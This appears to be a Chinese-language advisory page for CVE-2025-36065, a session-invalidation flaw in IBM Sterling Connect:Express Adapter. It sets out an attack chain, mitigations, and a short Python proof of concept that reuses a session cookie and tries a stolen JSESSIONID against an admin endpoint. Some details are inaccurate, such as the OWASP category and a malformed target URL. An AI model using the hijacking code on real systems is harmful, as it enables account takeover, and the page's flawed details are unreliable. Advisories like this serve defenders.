CVE-2025-36065 | IBM Sterling Connect:Express Adapter 会话管理漏洞

漏洞信息

漏洞编号

CVE-2025-36065

漏洞类型

会话管理漏洞

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0

漏洞概述

CVE-2025-36065是IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0版本中存在的一个会话管理安全漏洞。该漏洞的严重程度为中等，CVSS评分为6.3分。漏洞的根本原因在于应用程序在用户关闭浏览器后未能正确失效会话Cookie或会话标识符。具体来说，当用户关闭浏览器窗口时，服务器端的会话并未被主动销毁，导致攻击者可以通过获取或窃取这些未被正确失效的会话令牌来冒充合法用户。由于该漏洞需要攻击者已经拥有经过身份验证的用户会话，因此攻击复杂度较低，但仍然可能对系统安全性造成严重影响。攻击者利用此漏洞可以在不知道目标用户密码的情况下，以该用户的身份执行操作，从而获取未经授权的访问权限，访问敏感数据，或在系统中执行恶意操作。

技术细节

该漏洞属于OWASP Top 10中的A07:2021-Security Misconfiguration类别中的会话管理缺陷。IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0在处理用户会话时存在以下技术问题：1) 应用程序未实现安全的会话超时机制，当用户关闭浏览器后服务器端会话仍然保持活跃状态；2) 会话Cookie缺少适当的安全属性设置，如Secure、HttpOnly和SameSite标志配置不当或缺失；3) 服务器端缺乏会话终止后的令牌验证机制，允许旧令牌被重复使用。攻击者可以通过多种方式利用此漏洞：1) 通过XSS攻击窃取有效用户的会话Cookie；2) 通过网络嗅探获取未加密的会话令牌；3) 物理访问用户计算机获取存储的会话信息。一旦攻击者获取到有效的会话令牌，即可在自己的浏览器中使用该令牌冒充受害者用户，无需再次认证即可访问系统功能。

攻击链分析

STEP 1

步骤1

攻击者获取目标用户的会话令牌（通过XSS、网络嗅探或物理访问用户设备）

STEP 2

步骤2

目标用户关闭浏览器，但由于会话未正确失效，服务器端会话仍然活跃

STEP 3

步骤3

攻击者在自己的浏览器中使用窃取的会话Cookie发起请求

STEP 4

步骤4

服务器验证会话Cookie有效（因为未被正确失效），允许攻击者通过身份验证

STEP 5

步骤5

攻击者以受害者身份访问系统，执行未授权操作或窃取敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import time # CVE-2025-36065 PoC - Session Management Vulnerability in IBM Sterling Connect:Express # This PoC demonstrates the session not being invalidated after browser closure target_url = "https://target-ibm-server.com Sterling Connect:Express/" # Step 1: Authenticate with valid credentials login_data = { "username": "[email protected]", "password": "AttackerPassword123" } session = requests.Session() response = session.post(f"{target_url}/j_security_check", data=login_data) # Step 2: Extract session cookie after successful authentication session_cookie = session.cookies.get_dict() print(f"[*] Session Cookie obtained: {session_cookie}") # Step 3: Simulate browser closure by making request after delay # In real scenario, user would close browser here time.sleep(10) # Step 4: Attempt to use the same session cookie (should fail if properly invalidated) response = session.get(f"{target_url}/protected/resource", cookies=session_cookie) if response.status_code == 200: print("[!] VULNERABLE: Session still valid after browser closure!") print(f"[*] Attacker can impersonate user with cookie: {session_cookie}") else: print("[*] Session properly invalidated - not vulnerable") # Step 5: If vulnerable, impersonate another user # Attackers can use stolen session cookies to bypass authentication def exploit_with_stolen_cookie(cookie_value): exploit_session = requests.Session() exploit_session.cookies.set("JSESSIONID", cookie_value) response = exploit_session.get(f"{target_url}/admin/privileged-action") return response.status_code == 200 print("[*] CVE-2025-36065 PoC Complete")

影响范围

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.00

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.01

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.02

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.03

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.04

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.05

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.06

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.07

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.08

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.09

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.10

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.11

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.12

防御指南

临时缓解措施

在IBM官方发布修复版本之前，建议采取以下临时缓解措施：1) 限制对IBM Sterling Connect:Express管理界面的网络访问，仅允许受信任的IP地址访问；2) 启用Web应用防火墙（WAF）规则，监控异常的会话使用行为；3) 强制用户定期注销并重新登录，缩短会话生命周期；4) 监控和审计会话活动日志，及时发现可疑的会话劫持行为；5) 实施IP绑定和设备指纹验证，增加会话安全性；6) 对敏感操作实施额外的多因素认证。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36065
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36065
3 Details https://www.cvedetails.com/cve/CVE-2025-36065/
4 VulDB https://vuldb.com/cve/CVE-2025-36065
5 Link https://www.ibm.com/support/pages/node/7257244